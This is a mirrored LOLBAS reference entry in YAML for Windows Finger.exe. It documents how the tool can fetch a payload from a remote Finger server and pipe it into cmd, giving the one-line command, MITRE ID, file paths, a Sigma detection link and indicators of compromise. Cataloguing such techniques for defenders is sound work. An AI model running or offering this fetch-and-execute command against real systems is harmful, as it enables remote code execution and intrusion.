mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-09-19 18:24:02 +02:00
4f83231697
* Update SigmaHQ ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHQ ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHq ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHq ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> --------- Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com>
31 lines
1.5 KiB
YAML
31 lines
1.5 KiB
YAML
---
|
|
Name: Finger.exe
|
|
Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
|
|
Author: Ruben Revuelta
|
|
Created: 2021-08-30
|
|
Commands:
|
|
- Command: finger user@example.host.com | more +2 | cmd
|
|
Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'
|
|
Usecase: Download malicious payload
|
|
Category: Download
|
|
Privileges: User
|
|
MitreID: T1105
|
|
OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
|
|
Full_Path:
|
|
- Path: c:\windows\system32\finger.exe
|
|
- Path: c:\windows\syswow64\finger.exe
|
|
Detection:
|
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_finger_usage.yml
|
|
- IOC: finger.exe should not be run on a normal workstation.
|
|
- IOC: finger.exe connecting to external resources.
|
|
Resources:
|
|
- Link: https://twitter.com/DissectMalware/status/997340270273409024
|
|
- Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
|
|
Acknowledgement:
|
|
- Person: Ruben Revuelta (MAPFRE CERT)
|
|
Handle: '@rubn_RB'
|
|
- Person: Jose A. Jimenez (MAPFRE CERT)
|
|
Handle: '@Ocelotty6669'
|
|
- Person: Malwrologist
|
|
Handle: '@DissectMalware'
|